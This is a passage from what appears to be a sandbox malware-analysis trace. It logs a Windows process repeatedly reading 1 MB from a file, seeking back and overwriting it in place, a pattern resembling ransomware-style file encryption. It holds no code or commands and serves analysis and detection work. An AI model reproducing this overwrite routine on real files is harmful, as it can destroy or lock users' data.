lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.726] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.726] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.728] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.744] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.744] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.746] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.776] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.776] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.778] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.798] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.798] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.809] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.821] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.821] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.823] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.839] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.839] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.842] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.864] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.864] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.866] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.884] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.884] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.886] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.910] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.910] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.912] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.927] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.927] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.932] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.956] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.956] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.958] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.976] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.976] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.978] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.003] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.003] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.005] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.078] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.078] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.080] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.166] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.166] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.168] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.185] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.185] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.192] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.205] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.206] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.208] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.261] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.261] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.263] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.281] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.281] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.283] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.302] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.302] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.316] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.329] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.329] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.331] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.348] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.348] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.350] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.511] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.549] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.551] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.570] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.570] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.584] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.615] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.615] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.617] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.647] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.647] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.649] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.682] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.682] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.684] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.700] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.700] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.703] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.717] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.717] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.736] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.748] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.748] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.750] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.766] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.766] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.768] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.790] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.790] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.792] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.803] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.803] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.805] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.821] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.821] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.831] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.845] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.845] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.847] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.872] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.872] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.874] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.883] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.883] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.885] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0051.910] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.910] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0051.911] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, 